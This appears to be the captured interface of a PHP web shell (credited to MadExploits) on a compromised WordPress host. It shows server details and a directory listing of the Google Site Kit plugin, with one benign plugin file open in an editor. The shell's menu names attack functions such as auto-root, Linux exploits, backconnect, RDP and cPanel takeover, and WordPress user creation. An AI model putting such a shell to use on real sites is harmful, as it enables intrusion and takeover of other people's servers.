Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.217.87.78
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Modules /
[ HOME SHELL ]
Name
Size
Permission
Action
Tags
[ DIR ]
drwxr-xr-x
Datapoint.php
2.23
KB
-rw-r--r--
Module.php
22.54
KB
-rw-r--r--
Module_Registry.php
1.61
KB
-rw-r--r--
Module_Settings.php
1.95
KB
-rw-r--r--
Module_Sharing_Settings.php
6.64
KB
-rw-r--r--
Module_With_Activation.php
569
B
-rw-r--r--
Module_With_Assets.php
944
B
-rw-r--r--
Module_With_Assets_Trait.php
1.74
KB
-rw-r--r--
Module_With_Data_Available_Sta...
1.01
KB
-rw-r--r--
Module_With_Data_Available_Sta...
1.51
KB
-rw-r--r--
Module_With_Deactivation.php
579
B
-rw-r--r--
Module_With_Debug_Fields.php
558
B
-rw-r--r--
Module_With_Owner.php
574
B
-rw-r--r--
Module_With_Owner_Trait.php
1.73
KB
-rw-r--r--
Module_With_Persistent_Registr...
645
B
-rw-r--r--
Module_With_Scopes.php
621
B
-rw-r--r--
Module_With_Scopes_Trait.php
722
B
-rw-r--r--
Module_With_Service_Entity.php
680
B
-rw-r--r--
Module_With_Settings.php
534
B
-rw-r--r--
Module_With_Settings_Trait.php
1008
B
-rw-r--r--
Module_With_Tag.php
671
B
-rw-r--r--
Module_With_Tag_Trait.php
1.65
KB
-rw-r--r--
Modules.php
25
KB
-rw-r--r--
REST_Dashboard_Sharing_Control...
3.55
KB
-rw-r--r--
REST_Modules_Controller.php
25.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Module_With_Settings_Trait.php
<?php /** * Trait Google\Site_Kit\Core\Modules\Module_With_Settings_Trait * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Modules; /** * Trait for a module that includes a screen. * * @since 1.2.0 * @access private * @ignore */ trait Module_With_Settings_Trait { /** * Settings instance. * * @since 1.2.0 * * @var Module_Settings */ protected $settings; /** * Sets up the module's settings instance. * * @since 1.2.0 * * @return Module_Settings */ abstract protected function setup_settings(); /** * Gets the module's Settings instance. * * @since 1.2.0 * * @return Module_Settings Module_Settings instance. */ public function get_settings() { if ( ! $this->settings instanceof Module_Settings ) { $this->settings = $this->setup_settings(); } return $this->settings; } }
Close